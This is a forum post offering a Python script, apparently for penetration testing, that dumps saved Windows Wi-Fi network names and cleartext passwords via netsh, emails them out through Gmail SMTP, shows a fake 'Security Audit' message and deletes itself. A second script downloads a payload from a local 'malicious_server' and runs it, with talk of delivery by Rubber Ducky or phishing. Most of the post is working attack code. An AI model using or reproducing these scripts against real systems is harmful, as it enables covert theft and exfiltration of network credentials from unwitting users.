Identify SSID and Steal Wifi Credentials

[thegrizzlyonedge]

So I wanted to convince an enterprise of the importance of EAP-TLS for enterprise wireless access points that support sensitive systems.  I'm sure many of you have come across companies that use username and password for their companies access points. 

I'm fairly new at writing python scripts so please bare with.  Credit goes out to youtube channel "pytutorials" for the wifi_passwords function.

# Tested on Windows 10 - with McAfee AntiVirus

# Runs a subprocess - netsh and identifies SSID names and Passwords

# Packages the findings and sends wireless SSIDs and Credentials to an email

# Requirements
## Sender Gmail Email Address
## Sender Gmail API Key
## Email address of the person receiving the SSID names and Credentials 

How can we package this into a Rubber Ducky?

#!/usr/bin/env python

import subprocess
import tempfile
import time
import smtplib
from email.mime.text import MIMEText
from os import remove
from sys import argv

print('Security Audit will take one minute')

# from_address = Senders email address
from_address = 'who_it_is_from_email_address_here'
# to_address = Receivers email address
to_address = 'receiver_email_address_here'
# api_key = Gmail API key
api_key = 'who_it_is_from_gmail_api_key_here'

#Create a temporary file to write SSID and wifi_passwords
fp = tempfile.TemporaryFile(mode='w+t')

def wifi_passwords():
    "This writes to tempfile SSID and Password"
    a = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
    a = [i.split(":")[1][1:-1] for i in a if "All User Profile" in i]
    for i in a:
        results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
        results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
        try:
            fp.write(str("{:<30}|  {:<}\n".format(i, results[0])))
        except IndexError:
            fp.write(str("{:<30}|  {:<}\n".format(i, "")))
        except KeyboardInterrupt:
            print("User stopped program!")
    fp.seek(0)

def send_message():
    "Sends an email with SSIDs and Creds"
    msg = MIMEText(fp.read())
    msg['From'] = from_address
    msg['To'] = to_address
    msg['Subject'] = 'SSIDs and Creds'

    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.starttls()
    server.login(user=msg['From'], password=api_key)
    server.send_message(msg)
    server.quit()

wifi_passwords()
send_message()
fp.close()
# Below self destructs the python script when executed
remove(argv[0])

 

 

[thegrizzlyonedge]

I want to be able to use the above code in a Penetration Testing Engagement, either via Phishing or Rubber Ducky.

Here is what I did to test it.

# Create a local directory to act as the "malicious_server"
# In cmd.exe go to "malicious_server" directory

C:\> cd $filepath\malicious_server 

# I'm using python3.6, standup a http.server

C:\filepath\malicious_server>python -m http.server 8080

# Next, we can probably make this into a oneliner and apply it to a rubber ducky or phishing attack

#!/usr/bin/env python

import urllib.request
import os
import subprocess

filename = os.path.expanduser(path='~\Downloads\wifipw.py')
urllib.request.urlretrieve('http://127.0.0.1:8080/wifipw.py', filename)
subprocess.call(filename, shell=True)

# An example of the outcome will be something like the following in an email:

ssid_name1 | password1
ssid_name2 | password2
ssid_name3 | password3

The script will automatically remove itself from the system.